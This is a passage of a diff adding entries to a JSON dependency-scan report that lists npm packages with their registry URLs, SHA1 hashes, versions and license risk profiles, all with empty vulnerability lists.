"copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/4280aa42-a980-460b-93d3-ab884d816643" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "35cc6b9b-403f-4265-ab60-0c59ad117590", + "keyId": 27519152, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/shell-escape/-/shell-escape-0.2.0.tgz", + "homePage": "https://github.com/xxorax/node-shell-escape", + "genericPackageIndex": "https://www.npmjs.org/package/shell-escape" + }, + "matchType": "SHA1", + "sha1": "68fd025eb0490b4f567a027f0bf22480b5f84133", + "name": "shell-escape-0.2.0.tgz", + "artifactId": "shell-escape-0.2.0.tgz", + "version": "0.2.0", + "groupId": "shell-escape", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/77798aaa-fc79-48bf-9691-ad3aa8499b47" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "463c2221-7b4a-4ae8-aac0-30cfefe693e9", + "keyId": 27512485, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/webpack-dev-middleware/-/webpack-dev-middleware-3.7.0.tgz", + "homePage": "https://github.com/webpack/webpack-dev-middleware", + "genericPackageIndex": "https://www.npmjs.org/package/webpack-dev-middleware" + }, + "matchType": "SHA1", + "sha1": "ef751d25f4e9a5c8a35da600c5fda3582b5c6cff", + "name": "webpack-dev-middleware-3.7.0.tgz", + "artifactId": "webpack-dev-middleware-3.7.0.tgz", + "version": "3.7.0", + "groupId": "webpack-dev-middleware", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/887e246d-b932-4347-a3eb-8bd40aa33aba" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "037786d2-ec94-43c3-baff-27b716b7e2ce", + "keyId": 28432182, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/msgpack-lite/-/msgpack-lite-0.1.26.tgz", + "homePage": "https://github.com/kawanet/msgpack-lite", + "genericPackageIndex": "https://www.npmjs.org/package/msgpack-lite" + }, + "matchType": "SHA1", + "sha1": "dd3c50b26f059f25e7edee3644418358e2a9ad89", + "name": "msgpack-lite-0.1.26.tgz", + "artifactId": "msgpack-lite-0.1.26.tgz", + "version": "0.1.26", + "groupId": "msgpack-lite", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a6a53648-7c3a-4999-be5d-bd284644a0e2" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "00df2910-7143-4bf1-b705-cf53dff51702", + "keyId": 26955757, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/jsonfile/-/jsonfile-3.0.1.tgz", + "homePage": "https://github.com/jprichardson/node-jsonfile#readme", + "genericPackageIndex": "https://www.npmjs.org/package/jsonfile" + }, + "matchType": "SHA1", + "sha1": "a5ecc6f65f53f662c4415c7675a0331d0992ec66", + "name": "jsonfile-3.0.1.tgz", + "artifactId": "jsonfile-3.0.1.tgz", + "version": "3.0.1", + "groupId": "jsonfile", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/jsonfile/v/3.0.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "dcf634f8-414b-4998-85fc-de794a197547", + "keyId": 28432156, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/camelo/-/camelo-1.1.12.tgz", + "homePage": "https://github.com/IonicaBizau/camelo#readme", + "genericPackageIndex": "https://www.npmjs.org/package/camelo" + }, + "matchType": "SHA1", + "sha1": "c5b6b0c67253dfd6a73211e415a8c4a70fbcdeb9", + "name": "camelo-1.1.12.tgz", + "artifactId": "camelo-1.1.12.tgz", + "version": "1.1.12", + "groupId": "camelo", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b787351e-0940-42ac-910f-0114771569aa" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "63cc6ce1-c264-4276-a0b6-5be3e14ec12c", + "keyId": 27798172, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.templatesettings/-/lodash.templatesettings-4.2.0.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.templatesettings" + }, + "matchType": "SHA1", + "sha1": "e481310f049d3cf6d47e912ad09313b154f0fb33", + "name": "lodash.templatesettings-4.2.0.tgz", + "artifactId": "lodash.templatesettings-4.2.0.tgz", + "version": "4.2.0", + "groupId": "lodash.templatesettings", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/lodash.templatesettings/v/4.2.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "972a5149-5f31-4ccb-9548-aa55d8b4963a", + "keyId": 26965648, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/rx/-/rx-4.1.0.tgz", + "homePage": "https://github.com/Reactive-Extensions/RxJS", + "genericPackageIndex": "https://www.npmjs.org/package/rx" + }, + "matchType": "SHA1", + "sha1": "a5f13ff79ef3b740fe30aa803fb09f98805d4782", + "name": "rx-4.1.0.tgz", + "artifactId": "rx-4.1.0.tgz", + "version": "4.1.0", + "groupId": "rx", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/rx/v/4.1.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "ebe95828-d6dd-4b0e-ace6-8f3237593ebf", + "keyId": 27944711, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/p-limit/-/p-limit-2.2.1.tgz", + "homePage": "https://github.com/sindresorhus/p-limit#readme", + "genericPackageIndex": "https://www.npmjs.org/package/p-limit" + }, + "matchType": "SHA1", + "sha1": "aa07a788cc3151c939b5131f63570f0dd2009537", + "name": "p-limit-2.2.1.tgz", + "artifactId": "p-limit-2.2.1.tgz", + "version": "2.2.1", + "groupId": "p-limit", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/p-limit" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "306f2b75-e257-4a7b-8730-15186e25cb08", + "keyId": 28432138, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/ucfirst/-/ucfirst-1.0.0.tgz", + "homePage": "https://github.com/deathcap/ucfirst", + "genericPackageIndex": "https://www.npmjs.org/package/ucfirst" + }, + "matchType": "SHA1", + "sha1": "4e105b6448d05e264ecec435e0b919363c5f2f2f", + "name": "ucfirst-1.0.0.tgz", + "artifactId": "ucfirst-1.0.0.tgz", + "version": "1.0.0", + "groupId": "ucfirst", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/b223a6dd-0592-4909-a21e-bf2f2a2cc191" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f5a78339-4a2e-464a-9469-94ed815baf70", + "keyId": 27911538, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/js-cookie/-/js-cookie-2.2.1.tgz", + "homePage": "https://github.com/js-cookie/js-cookie#readme", + "genericPackageIndex": "https://www.npmjs.org/package/js-cookie" + }, + "matchType": "SHA1", + "sha1": "69e106dc5d5806894562902aa5baec3744e9b2b8", + "name": "js-cookie-2.2.1.tgz", + "artifactId": "js-cookie-2.2.1.tgz", + "version": "2.2.1", + "groupId": "js-cookie", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/js-cookie/v/2.2.1" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "749bfe4c-e6a5-4aa1-9f54-23a11a02044d", + "keyId": 27007679, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/camelcase/-/camelcase-5.0.0.tgz", + "homePage": "https://github.com/sindresorhus/camelcase#readme", + "genericPackageIndex": "https://www.npmjs.org/package/camelcase" + }, + "matchType": "SHA1", + "sha1": "03295527d58bd3cd4aa75363f35b2e8d97be2f42", + "name": "camelcase-5.0.0.tgz", + "artifactId": "camelcase-5.0.0.tgz", + "version": "5.0.0", + "groupId": "camelcase", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/3f53fafe-c5e8-4377-8115-735cdbb5c84c" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4e5321d7-f839-4752-b724-86415ce44904", + "keyId": 28432172, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/spawn-shell/-/spawn-shell-2.1.0.tgz", + "homePage": "https://github.com/parro-it/spawn-shell#readme", + "genericPackageIndex": "https://www.npmjs.org/package/spawn-shell" + }, + "matchType": "SHA1", + "sha1": "dce87b911ff7339470c9ce39ab60c61bcc3891d0", + "name": "spawn-shell-2.1.0.tgz", + "artifactId": "spawn-shell-2.1.0.tgz", + "version": "2.1.0", + "groupId": "spawn-shell", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/e5aa29bf-b22b-418d-bffb-3ba59db16c28" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "acf892c9-e9b9-4264-8c26-8cea91fcb0a7", + "keyId": 28432204, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@contentful/rich-text-react-renderer/-/rich-text-react-renderer-13.4.0.tgz", + "homePage": "https://github.com/contentful/rich-text#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@contentful/rich-text-react-renderer" + }, + "matchType": "SHA1", + "sha1": "2efb556f58d608472c2dde692153c7b7b985fae7", + "name": "rich-text-react-renderer-13.4.0.tgz", + "artifactId": "rich-text-react-renderer-13.4.0.tgz", + "version": "13.4.0", + "groupId": "@contentful/rich-text-react-renderer", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@contentful/rich-text-react-renderer" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "4b909227-5b64-4a18-b770-5cb234129387", + "keyId": 28432153, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/regex-escape/-/regex-escape-3.4.9.tgz", + "homePage": "https://github.com/IonicaBizau/regex-escape.js", + "genericPackageIndex": "https://www.npmjs.org/package/regex-escape" + }, + "matchType": "SHA1", + "sha1": "407b413562e2373d56994ff213e693658ea4f8f7", + "name": "regex-escape-3.4.9.tgz", + "artifactId": "regex-escape-3.4.9.tgz", + "version": "3.4.9", + "groupId": "regex-escape", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/6b137392-f876-4ea0-9c4a-6892025f0438" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "32e07674-7440-4f84-ae50-9ab92a7c656d", + "keyId": 27100304, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/postcss-overflow-shorthand/-/postcss-overflow-shorthand-2.0.0.tgz", + "homePage": "https://github.com/jonathantneal/postcss-overflow-shorthand#readme", + "genericPackageIndex": "https://www.npmjs.org/package/postcss-overflow-shorthand" + }, + "matchType": "SHA1", + "sha1": "31ecf350e9c6f6ddc250a78f0c3e111f32dd4c30", + "name": "postcss-overflow-shorthand-2.0.0.tgz", + "artifactId": "postcss-overflow-shorthand-2.0.0.tgz", + "version": "2.0.0", + "groupId": "postcss-overflow-shorthand", + "licenses": [ + { + "name": "CC0", + "url": "http://creativecommons.org/publicdomain/zero/1.0/legalcode", + "profileInfo": {}, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/postcss-overflow-shorthand" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "f7a54d4f-a60c-4423-bf37-86a5385f1dcf", + "keyId": 26963121, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/diagnostics/-/diagnostics-1.1.1.tgz", + "homePage": "https://github.com/bigpipe/diagnostics", + "genericPackageIndex": "https://www.npmjs.org/package/diagnostics" + }, + "matchType": "SHA1", + "sha1": "cab6ac33df70c9d9a727490ae43ac995a769b22a", + "name": "diagnostics-1.1.1.tgz", + "artifactId": "diagnostics-1.1.1.tgz", + "version": "1.1.1", + "groupId": "diagnostics", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/diagnostics" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "3ab45ce8-5f7b-4c49-8443-bdb5ed4ae53f", + "keyId": 28036658, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", + "homePage": "https://github.com/form-data/form-data#readme", + "genericPackageIndex": "https://www.npmjs.org/package/form-data" + }, + "matchType": "SHA1", + "sha1": "f2cbec57b5e59e23716e128fe44d4e5dd23895f4", + "name": "form-data-2.5.1.tgz", + "artifactId": "form-data-2.5.1.tgz", + "version": "2.5.1", + "groupId": "form-data", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://github.com/form-data/form-data/blob/v2.5.1/package.json" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "641b12ab-19e6-4695-8d9c-c15c61e891eb", + "keyId": 28432192, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-table/-/honeyui-table-1.1.1.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/table#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-table" + }, + "matchType": "SHA1", + "sha1": "d6e21ea3db1b07edff601065cbaab9bb73db088e", + "name": "honeyui-table-1.1.1.tgz", + "artifactId": "honeyui-table-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@test/honeyui-table", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "8f90c089-c81b-4e9b-9b73-54ff86134502", + "keyId": 27824907, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/async/-/async-2.6.3.tgz", + "homePage": "https://caolan.github.io/async/", + "genericPackageIndex": "https://www.npmjs.org/package/async" + }, + "matchType": "SHA1", + "sha1": "d72625e2344a3656e3a3ad4fa749fa83299d82ff", + "name": "async-2.6.3.tgz", + "artifactId": "async-2.6.3.tgz", + "version": "2.6.3", + "groupId": "async", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/dac2d053-197a-47aa-8f86-f34051659859" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "55fd45cd-4259-455c-b79d-cb3b88ff7675", + "keyId": 28432145, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/contentful/-/contentful-7.10.0.tgz", + "homePage": "https://www.contentful.com/developers/documentation/content-delivery-api/", + "genericPackageIndex": "https://www.npmjs.org/package/contentful" + }, + "matchType": "SHA1", + "sha1": "c0744e3ebd519ee1c6ae36beeac8a17d1d0c00a6", + "name": "contentful-7.10.0.tgz", + "artifactId": "contentful-7.10.0.tgz", + "version": "7.10.0", + "groupId": "contentful", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/contentful" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "14f5b724-4f13-453c-a76d-bc53bf40c8a6", + "keyId": 28432171, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@test/honeyui-pagination/-/honeyui-pagination-1.1.1.tgz", + "homePage": "https://github.com/test/honeyui/tree/master/packages/pagination#readme", + "genericPackageIndex": "https://www.npmjs.org/package/@test/honeyui-pagination" + }, + "matchType": "SHA1", + "sha1": "f5c021898ade72073010d7223da24fc69fcc0933", + "name": "honeyui-pagination-1.1.1.tgz", + "artifactId": "honeyui-pagination-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@test/honeyui-pagination", + "licenses": [], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "d85dcbb7-b8ab-46fe-8b16-953c4f4859fa", + "keyId": 27820888, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/mini-css-extract-plugin/-/mini-css-extract-plugin-0.8.0.tgz", + "homePage": "https://github.com/webpack-contrib/mini-css-extract-plugin", + "genericPackageIndex": "https://www.npmjs.org/package/mini-css-extract-plugin" + }, + "matchType": "SHA1", + "sha1": "81d41ec4fe58c713a96ad7c723cdb2d0bd4d70e1", + "name": "mini-css-extract-plugin-0.8.0.tgz", + "artifactId": "mini-css-extract-plugin-0.8.0.tgz", + "version": "0.8.0", + "groupId": "mini-css-extract-plugin", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/a2157e7d-8fcb-4e89-acd2-51bbd4af93ea" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b472524c-11fa-4786-b2d1-1b1819966550", + "keyId": 27083653, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/topo/-/topo-3.0.3.tgz", + "homePage": "https://github.com/hapijs/topo#readme", + "genericPackageIndex": "https://www.npmjs.org/package/topo" + }, + "matchType": "SHA1", + "sha1": "d5a67fb2e69307ebeeb08402ec2a2a6f5f7ad95c", + "name": "topo-3.0.3.tgz", + "artifactId": "topo-3.0.3.tgz", + "version": "3.0.3", + "groupId": "topo", + "licenses": [ + { + "name": "BSD 3", + "url": "http://www.opensource.org/licenses/BSD-3-Clause", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/topo/v/3.0.3" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "db2afb20-19b1-44ab-b1bd-2748fa6604d3", + "keyId": 26954920, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/colors/-/colors-1.0.3.tgz", + "homePage": "https://github.com/Marak/colors.js", + "genericPackageIndex": "https://www.npmjs.org/package/colors" + }, + "matchType": "SHA1", + "sha1": "0433f44d809680fdeb60ed260f1b0c262e82a40b", + "name": "colors-1.0.3.tgz", + "artifactId": "colors-1.0.3.tgz", + "version": "1.0.3", + "groupId": "colors", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/colors/v/1.0.3" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "e72ab676-f867-477c-9282-ac522fbe5a43", + "keyId": 26965793, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/thenify-all/-/thenify-all-1.6.0.tgz", + "homePage": "https://github.com/thenables/thenify-all", + "genericPackageIndex": "https://www.npmjs.org/package/thenify-all" + }, + "matchType": "SHA1", + "sha1": "1a1918d402d8fc3f98fbf234db0bcc8cc10e9726", + "name": "thenify-all-1.6.0.tgz", + "artifactId": "thenify-all-1.6.0.tgz", + "version": "1.6.0", + "groupId": "thenify-all", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/thenify-all/v/1.6.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "a1e868de-126d-4743-92bc-27c942c9aedc", + "keyId": 26963124, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/triple-beam/-/triple-beam-1.3.0.tgz", + "homePage": "https://github.com/winstonjs/triple-beam#readme", + "genericPackageIndex": "https://www.npmjs.org/package/triple-beam" + }, + "matchType": "SHA1", + "sha1": "a595214c7298db8339eeeee083e4d10bd8cb8dd9", + "name": "triple-beam-1.3.0.tgz", + "artifactId": "triple-beam-1.3.0.tgz", + "version": "1.3.0", + "groupId": "triple-beam", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://index.whitesourcesoftware.com/gri/app/reader/resource/content/asString/e029b8a2-a6f0-4a24-82d6-6545163777ad" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "b94aae36-dfb5-4c22-aef1-9c84e0d60332", + "keyId": 26961669, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/lodash.pick/-/lodash.pick-4.4.0.tgz", + "homePage": "https://lodash.com/", + "genericPackageIndex": "https://www.npmjs.org/package/lodash.pick" + }, + "matchType": "SHA1", + "sha1": "52f05610fff9ded422611441ed1fc123a03001b3", + "name": "lodash.pick-4.4.0.tgz", + "artifactId": "lodash.pick-4.4.0.tgz", + "version": "4.4.0", + "groupId": "lodash.pick", + "licenses": [ + { + "name": "MIT", + "url": "http://www.opensource.org/licenses/MIT", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "royaltyFree": "YES" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/lodash.pick/v/4.4.0" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "1b5dfb23-5575-4d0a-9d72-d49c804e24df", + "keyId": 28389789, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/@ampproject/toolbox-runtime-version/-/toolbox-runtime-version-1.1.1.tgz", + "homePage": "https://github.com/ampproject/amp-toolbox/tree/master/packages/runtime-version", + "genericPackageIndex": "https://www.npmjs.org/package/@ampproject/toolbox-runtime-version" + }, + "matchType": "SHA1", + "sha1": "628fe5091db4f90b68960620e22ad64f9f2563bd", + "name": "toolbox-runtime-version-1.1.1.tgz", + "artifactId": "toolbox-runtime-version-1.1.1.tgz", + "version": "1.1.1", + "groupId": "@ampproject/toolbox-runtime-version", + "licenses": [ + { + "name": "Apache 2.0", + "url": "http://apache.org/licenses/LICENSE-2.0", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "ONE", + "copyleft": "NO", + "linking": "DYNAMIC", + "royaltyFree": "CONDITIONAL" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": "https://www.npmjs.com/package/@ampproject/toolbox-runtime-version" + } + ], + "vulnerabilities": [], + "customAttributeValues": [] + }, + { + "keyUuid": "76d3c53a-6576-4a38-bbd4-46ee2213860e", + "keyId": 26948646, + "type": "NODE_PACKAGED_MODULE", + "languages": "javascript/Node.js", + "references": { + "url": "https://registry.npmjs.org/read/-/read-1.0.7.tgz", + "homePage": "https://github.com/isaacs/read#readme", + "genericPackageIndex": "https://www.npmjs.org/package/read" + }, + "matchType": "SHA1", + "sha1": "b3da19bd052431a97671d44a42634adf710b40c4", + "name": "read-1.0.7.tgz", + "artifactId": "read-1.0.7.tgz", + "version": "1.0.7", + "groupId": "read", + "licenses": [ + { + "name": "ISC", + "url": "http://www.opensource.org/licenses/ISC", + "profileInfo": { + "copyrightRiskScore": "THREE", + "patentRiskScore": "THREE", + "copyleft": "NO", + "linking": "NON_VIRAL", + "royaltyFree": "NO" + }, + "referenceType": "NPM (details available in Node Package Manager)", + "reference": 